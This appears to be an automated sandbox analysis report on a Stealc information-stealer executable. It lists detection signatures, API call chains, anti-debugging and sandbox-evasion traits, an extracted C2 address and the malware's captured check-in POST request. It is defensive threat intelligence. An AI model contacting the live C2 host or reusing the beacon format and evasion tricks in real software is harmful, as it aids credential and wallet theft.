Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562132
MD5:	195eafa20236c52b744d7ff88ccf8dd6
SHA1:	eb079dc207806442f57ef816f42f8b0a1835aa46
SHA256:	110760d0807d24cda6139d69aee2e1166753ad3ee33e4f9751f3c036903838b4
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.phpft	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpv9	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/d9	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.7468.1.memstrmin

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E44C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_00E44C50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_00E460D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_00E640B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E56960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,	1_2_00E56960
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,	1_2_00E4EA30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E49B80 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00E49B80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E56B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,	1_2_00E56B79
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E49B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00E49B20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E47750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00E47750

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E518A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E53910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51269
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51250
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5E210
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5CBE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E523A9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,	1_2_00E52390
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB99
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E54B29
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E54B10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_00E5DD30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E5D530
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E416A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E416B9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49710 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/c4becf79229cb002.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="hwid"2553E978FAD72284582127------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build"mars------IJECAEHJJJKJKFIDGCBG--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E46C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,

1_2_00E46C40

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="hwid"2553E978FAD72284582127------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build"mars------IJECAEHJJJKJKFIDGCBG--

Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/H
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv9
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/d9
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E49770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,

1_2_00E49770

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D	1_2_0120911D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E648B0	1_2_00E648B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120C8AC	1_2_0120C8AC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01246097	1_2_01246097
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011300F7	1_2_011300F7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01202B2C	1_2_01202B2C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120ABA1	1_2_0120ABA1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011FD3C1	1_2_011FD3C1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011DBA50	1_2_011DBA50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01168AE9	1_2_01168AE9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_010F4D90	1_2_010F4D90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012075EC	1_2_012075EC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120FCE5	1_2_0120FCE5
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0117877A	1_2_0117877A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012117CB	1_2_012117CB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01203FD9	1_2_01203FD9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011FEEA9	1_2_011FEEA9

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00E44A60 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: olrcobvx ZLIB complexity 0.9947689559108527

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

